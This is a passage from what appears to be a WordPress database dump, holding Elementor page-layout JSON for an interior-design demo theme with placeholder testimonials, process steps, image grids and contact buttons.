solutions.\",\"_id\":\"71b5562\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/jessica.jpg\",\"id\":1416,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/background-line-yellow.png\",\"id\":1422,\"alt\":\"\",\"source\":\"library\"},\"background_color_item\":\"#DDAD58\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"705dd08\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mike-hardson.jpg\",\"id\":1417,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_repeat\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_color_item\":\"#1B1B1B\"},{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/kevin-martin.jpg\",\"id\":1415,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_position\":\"initial\",\"background_image_position_tablet\":\"initial\",\"background_image_position_mobile\":\"initial\",\"background_image_xpos\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_image_xpos_mobile\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_ypos\":{\"unit\":\"%\",\"size\":103,\"sizes\":[]},\"background_image_ypos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_image_repeat\":\"no-repeat\",\"background_image_repeat_mobile\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_image_size_tablet\":\"cover\",\"background_image_size_mobile\":\"cover\",\"background_color_item\":\"#1B1B1B\",\"_id\":\"8eb7d44\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mike-hardson.jpg\",\"id\":1417,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_repeat\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_color_item\":\"#1B1B1B\",\"_id\":\"23b7d8f\"},{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/kevin-martin.jpg\",\"id\":1415,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_position\":\"initial\",\"background_image_position_tablet\":\"initial\",\"background_image_position_mobile\":\"initial\",\"background_image_xpos\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_image_xpos_mobile\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_ypos\":{\"unit\":\"%\",\"size\":103,\"sizes\":[]},\"background_image_ypos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_image_repeat\":\"no-repeat\",\"background_image_repeat_mobile\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_image_size_tablet\":\"cover\",\"background_image_size_mobile\":\"cover\",\"background_color_item\":\"#1B1B1B\",\"_id\":\"6c7e338\"}],\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-280\",\"left\":\"0\",\"isLinked\":false},\"icon_quote\":{\"value\":\"flaticon flaticon-quotes\",\"library\":\"flaticon\"},\"tab_item_v2\":[{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"cf6d2b9\"},{\"name_author\":\"Jessica brown \",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"e73dd09\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"127b5e7\"}],\"tab_item_v3\":[{\"name_author\":\"Kevin martin\",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"163297c\"},{\"name_author\":\"Jessica brown \",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"bcfaaf7\"},{\"name_author\":\"Mike hardson\",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"80c4005\"}],\"icon_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"dot_control\":\"yes\",\"_animation\":\"bounceInUp\",\"autoplay\":\"\"},\"elements\":[],\"widgetType\":\"retirio_elementor_testimonial\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f7c9652\",\"elType\":\"section\",\"settings\":{\"padding\":{\"unit\":\"px\",\"top\":\"327\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"297\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"77dbf66\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"080887e\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Our process\",\"title\":\"4 easy work steps\",\"_animation\":\"ova-move-down\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"_animation_tablet\":\"none\",\"animation_duration\":\"fast\",\"_animation_delay\":100},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"ec83ee9\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\",\"margin\":{\"unit\":\"px\",\"top\":\"50\",\"right\":0,\"bottom\":\"120\",\"left\":0,\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"50\",\"right\":0,\"bottom\":\"90\",\"left\":0,\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":0,\"bottom\":\"30\",\"left\":0,\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"a992324\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"fadeInDown\",\"animation_tablet\":\"none\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/line-1.png\",\"id\":3838,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":60,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"65\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":50,\"align_tablet\":\"center\",\"background_position_tablet\":\"initial\",\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":150,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"content_position_tablet\":\"top\",\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"background_ypos\":{\"unit\":\"px\",\"size\":-1,\"sizes\":[]}},\"elements\":[{\"id\":\"fd3636d\",\"elType\":\"widget\",\"settings\":{\"text\":\"Design\\nconcept \\n\",\"numerical_order\":\"01\",\"top_order\":{\"unit\":\"px\",\"size\":-24,\"sizes\":[]},\"right_order\":{\"unit\":\"px\",\"size\":-80,\"sizes\":[]},\"_element_width_mobile\":\"auto\",\"bottom_mobile\":{\"unit\":\"px\",\"size\":175,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_ova_icon_box_2\"}],\"isInner\":true},{\"id\":\"b9984a7\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"animation\":\"fadeInDown\",\"animation_tablet\":\"none\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/line-2.png\",\"id\":3839,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"background_ypos\":{\"unit\":\"px\",\"size\":135,\"sizes\":[]},\"background_ypos_tablet\":{\"unit\":\"px\",\"size\":140,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"55\",\"right\":\"0\",\"bottom\":\"65\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":50,\"align_tablet\":\"center\",\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"content_position_tablet\":\"bottom\",\"background_position_tablet\":\"initial\",\"margin_mobile\":{\"unit\":\"px\",\"top\":\"120\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"animation_delay\":250},\"elements\":[{\"id\":\"aba257a\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"flaticon flaticon-interior-design\",\"library\":\"flaticon\"},\"text\":\"Design\\nschematic \\n\",\"numerical_order\":\"02\",\"text_position\":\"top-left\",\"_element_width_mobile\":\"auto\"},\"elements\":[],\"widgetType\":\"retirio_elementor_ova_icon_box_2\"}],\"isInner\":true},{\"id\":\"24d2339\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"fadeInDown\",\"animation_tablet\":\"none\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/line-1.png\",\"id\":3838,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":57,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"65\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":50,\"align_tablet\":\"center\",\"background_position_tablet\":\"initial\",\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":60,\"sizes\":[]},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"content_position_tablet\":\"top\",\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"animation_delay\":500},\"elements\":[{\"id\":\"0f2ef7d\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"flaticon flaticon-development\",\"library\":\"flaticon\"},\"text\":\"Design\\ndevelopment\",\"numerical_order\":\"03\",\"top_order\":{\"unit\":\"px\",\"size\":-27,\"sizes\":[]},\"_element_width_mobile\":\"auto\",\"bottom_mobile\":{\"unit\":\"px\",\"size\":175,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_ova_icon_box_2\"}],\"isInner\":true},{\"id\":\"d6ce61d\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"animation\":\"fadeInDown\",\"animation_tablet\":\"none\",\"_inline_size_tablet\":50,\"content_position_tablet\":\"bottom\",\"align_tablet\":\"center\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/line-2.png\",\"id\":3839,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_position_tablet\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":-100,\"sizes\":[]},\"background_ypos\":{\"unit\":\"px\",\"size\":135,\"sizes\":[]},\"background_ypos_tablet\":{\"unit\":\"px\",\"size\":140,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":-100,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"55\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"animation_delay\":750},\"elements\":[{\"id\":\"020e37a\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"flaticon flaticon-construction\",\"library\":\"flaticon\"},\"text\":\"Construction\\ndevelopment\",\"numerical_order\":\"04\",\"text_position\":\"top-left\",\"_element_width_mobile\":\"auto\"},\"elements\":[],\"widgetType\":\"retirio_elementor_ova_icon_box_2\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"cbd0171\",\"elType\":\"section\",\"settings\":{\"structure\":\"60\",\"background_background\":\"classic\",\"background_color\":\"#242424\",\"padding\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"0\",\"bottom\":\"50\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"0137b13\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":17.178,\"_inline_size_tablet\":33,\"background_background\":\"classic\",\"background_image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5387f04\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/01-test.png\",\"id\":1901,\"alt\":\"\",\"source\":\"library\"},\"align\":\"left\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"0238cd9\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":16.427,\"_inline_size_tablet\":33,\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"2140ada\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/02-home1.png\",\"id\":1903,\"alt\":\"\",\"source\":\"library\"},\"align\":\"left\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"22014c4\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":15.06,\"_inline_size_tablet\":33,\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"812d896\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/03-home1.png\",\"id\":1904,\"alt\":\"\",\"source\":\"library\"},\"align\":\"left\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"282c361\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":13.587,\"_inline_size_tablet\":33,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"7e86368\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/04-home1.png\",\"id\":1905,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"44b0fc9\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":17.368,\"_inline_size_tablet\":33,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"78697fd\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/05-home1.png\",\"id\":1906,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"861133d\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":18.375,\"_inline_size_tablet\":33},\"elements\":[{\"id\":\"10e265f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/06-home1.png\",\"id\":1907,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9e0e567\",\"elType\":\"section\",\"settings\":{\"margin\":{\"unit\":\"px\",\"top\":\"107\",\"right\":0,\"bottom\":\"80\",\"left\":0,\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"67\",\"right\":0,\"bottom\":\"50\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"5ed1170\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"bb1865f\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Direct from the blog posts\",\"title\":\"\\nCheckout our latest news\\nand articles\",\"content_typography_title_typography\":\"custom\",\"content_typography_title_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"content_typography_title_font_weight\":\"800\",\"content_typography_sub_title_typography\":\"custom\",\"content_typography_sub_title_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"content_typography_sub_title_font_weight\":\"600\",\"content_typography_sub_title_letter_spacing\":{\"unit\":\"px\",\"size\":2.2,\"sizes\":[]},\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"25f2c71\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"retirio_elementor_blog_grid_2\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7a90e77\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\",\"gap\":\"no\",\"background_background\":\"classic\",\"background_color\":\"#E3B25A\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/background-get-interior.png\",\"id\":1896,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":1,\"sizes\":[]},\"background_xpos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_ypos\":{\"unit\":\"%\",\"size\":80,\"sizes\":[]},\"background_ypos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"80\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"10\",\"bottom\":\"80\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"f4bedba\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"4440af1\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Hire us for your new projects\",\"title\":\"Get interior designs right now\",\"align_heading\":\"left\",\"content_typography_title_typography\":\"custom\",\"content_typography_title_font_size\":{\"unit\":\"px\",\"size\":40,\"sizes\":[]},\"content_typography_title_font_weight\":\"800\",\"color_title\":\"#FFFFFF\",\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"content_typography_sub_title_typography\":\"custom\",\"content_typography_sub_title_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"content_typography_sub_title_font_weight\":\"400\",\"content_typography_sub_title_text_transform\":\"none\",\"color_sub_title\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"}],\"isInner\":false},{\"id\":\"e99860c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"content_position\":\"center\",\"align\":\"center\",\"align_mobile\":\"flex-start\"},\"elements\":[{\"id\":\"8cfb32b\",\"elType\":\"widget\",\"settings\":{\"text\":\"contact with us\",\"typography_typography\":\"custom\",\"typography_text_transform\":\"uppercase\",\"background_color\":\"#242424\",\"hover_color\":\"#E3B25A\",\"text_padding\":{\"unit\":\"px\",\"top\":\"18\",\"right\":\"40\",\"bottom\":\"18\",\"left\":\"40\",\"isLinked\":false},\"button_bg_hover\":\"#FFFFFF\",\"button_before_width\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"button_before_height\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"_element_width\":\"auto\",\"_element_vertical_align\":\"center\",\"link\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/contact\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"typography_font_weight\":\"800\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e200d46\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"571494c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"178b61f\",\"elType\":\"widget\",\"settings\":{\"selected_icon\":{\"value\":\"flaticon flaticon-buildings\",\"library\":\"flaticon\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\"},\"elements\":[],\"widgetType\":\"icon-box\"}],\"isInner\":false}],\"isInner\":false}]'),(3862,4870,'_elementor_page_assets','a:1:{s:6:\"styles\";a:15:{i:0;s:12:\"e-animations\";i:1;s:12:\"e-animations\";i:2;s:12:\"e-animations\";i:3;s:12:\"e-animations\";i:4;s:12:\"e-animations\";i:5;s:12:\"e-animations\";i:6;s:12:\"e-animations\";i:7;s:12:\"e-animations\";i:8;s:12:\"e-animations\";i:9;s:12:\"e-animations\";i:10;s:12:\"e-animations\";i:11;s:12:\"e-animations\";i:12;s:12:\"e-animations\";i:13;s:12:\"e-animations\";i:14;s:12:\"e-animations\";}}'),(3863,4870,'_elementor_pro_version','3.8.1'),(3865,4871,'_wp_page_template','elementor_header_footer'),(3866,4871,'_elementor_edit_mode','builder'),(3867,4871,'_elementor_template_type','wp-page'),(3868,4871,'_elementor_version','3.8.1'),(3869,4871,'_elementor_data','[{\"id\":\"013ca3e\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/bg-section-1.png\",\"id\":3589,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"center right\",\"background_repeat\":\"no-repeat\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"120\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"10\",\"bottom\":\"80\",\"left\":\"10\",\"isLinked\":false},\"background_position_tablet\":\"top 